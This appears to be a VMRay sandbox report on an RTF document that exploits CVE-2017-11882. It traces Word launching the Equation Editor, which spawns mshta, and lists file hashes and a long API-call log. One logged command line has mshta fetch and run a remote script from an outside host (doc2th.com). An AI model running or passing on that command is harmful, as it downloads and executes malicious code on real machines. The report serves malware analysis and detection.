RTF Document Takes Advantage of CVE-2017-11882 Vulnerability | Sequential Behavior
Try VMRay Analyzer
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:13, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:19, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:06 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x95c |
| Parent PID | 0x610 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
998
0x
994
0x
990
0x
98C
0x
988
0x
984
0x
978
0x
974
0x
970
0x
96C
0x
968
0x
960
0x
A84
0x
A8C
0x
AA0
|
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\program files\common files\microsoft shared\equation\eqnedt32.exe |
| Command Line | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:22, Reason: RPC Server |
| Unmonitor | End Time: 00:02:19, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x9f4 |
| Parent PID | 0x254 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9F8
0x
9FC
0x
A00
0x
A04
0x
A08
|
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\mshta.exe |
| Command Line | mShta http://doc2th.com/tin/foobaz.txt &AAAAC |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:24, Reason: Child Process |
| Unmonitor | End Time: 00:02:19, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
| Information | Value |
|---|---|
| PID | 0xa18 |
| Parent PID | 0x9f4 (c:\program files\common files\microsoft shared\equation\eqnedt32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A1C
0x
A20
0x
A24
0x
A28
0x
A2C
0x
A30
0x
A34
0x
A38
0x
A3C
0x
A94
0x
B38
0x
B3C
0x
B40
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\b9mx3v6b\foobaz[1].txt | 0.33 KB (335 bytes) |
MD5:
5e96b592b960ec8b481f9a75f6d60e3b
SHA1: 495590c98ccbfcbc17a622e29912d4ad4009b36e SHA256: b17c0528463b2e7c191c2adaec4135848564597531cb9b7554b8fc80d1ac0c45 |
|
|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 64.00 KB (65536 bytes) |
MD5:
538010a9ee2bd83dce6e6181bcda3df3
SHA1: 5f8d3d25c60d5c9ecf2627422c77c7a895c67d4e SHA256: 9f70b9e987c662a9555182f299b9196ae5b3bb5e8128dd75e5ac3e6f49632b60 |
|
|
| c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB (32768 bytes) |
MD5:
52e5f12a1c455d32f6cafd01a89ad68e
SHA1: 3de6de86748edb5d0f9c7ca464a2301ee03b753b SHA256: d2b2d583e7f30d11cb2daeae50b2617676783ed6cd360e0b47209d9787e224a2 |
|
|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat | 48.00 KB (49152 bytes) |
MD5:
d35b4ef54f22a55d2252d7c75217680e
SHA1: bc0c688702dc593e4a8448d723dd9311ee177aba SHA256: 6871ece75631267dfa058661f117eda144a1f1936468df1d8cf7eb1f4b11474d |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2017-12-20 14:26:49 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 88015 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0x2b0000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76c6418d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76c61e16 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76c676e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x76c61f61 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = EncodePointer, address_out = 0x76faa295 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = EncodePointer, address_out = 0x76faa295 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = EncodePointer, address_out = 0x76faa295 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = EncodePointer, address_out = 0x76faa295 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = EncodePointer, address_out = 0x76faa295 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = EncodePointer, address_out = 0x76faa295 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = EncodePointer, address_out = 0x76faa295 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x7526726b |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = EncodePointer, address_out = 0x76faa295 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x75260000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = EncodePointer, address_out = 0x76faa295 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = DecodePointer, address_out = 0x76facd10 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x76c64157 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, data = C:\Windows\System32\mshtml.dll, type = REG_SZ |
|
1 | |
| Module | Load | module_name = C:\Windows\System32\mshtml.dll, base_address = 0x63150000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x76c64157 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | |
| Module | Get Filename | module_name = C:\Windows\System32\mshtml.dll, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshtml.dll, size = 260 |
|
1 | |
| File | Open Mapping | filename = #MSHTML#PERF#00000A18, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\advapi32.dll, base_address = 0x754d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventWrite, address_out = 0x76f7d59a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventRegister, address_out = 0x76fb5b0c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventUnregister, address_out = 0x76fad9dd |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0x2b0000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\mshta.exe, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = RegisterApplicationRestart, address_out = 0x76c43665 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\mshtml.dll, function = RunHTMLApplication, address_out = 0x631ae710 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1667798656 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1667798656 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x74080000 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 260 |
|
2 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeSRWLock, address_out = 0x76fa9981 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x76fa334e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockShared, address_out = 0x76fa338e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x76fa3324 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockShared, address_out = 0x76fa33d7 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x75580000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 6, address_out = 0x75583e59 |
|
1 | |
| System | Get Info | - |
|
2 | |
| Module | Get Handle | module_name = EXPLORER.EXE, base_address = 0x0 |
|
1 | |
| Module | Get Handle | module_name = IEXPLORE.EXE, base_address = 0x0 |
|
1 | |
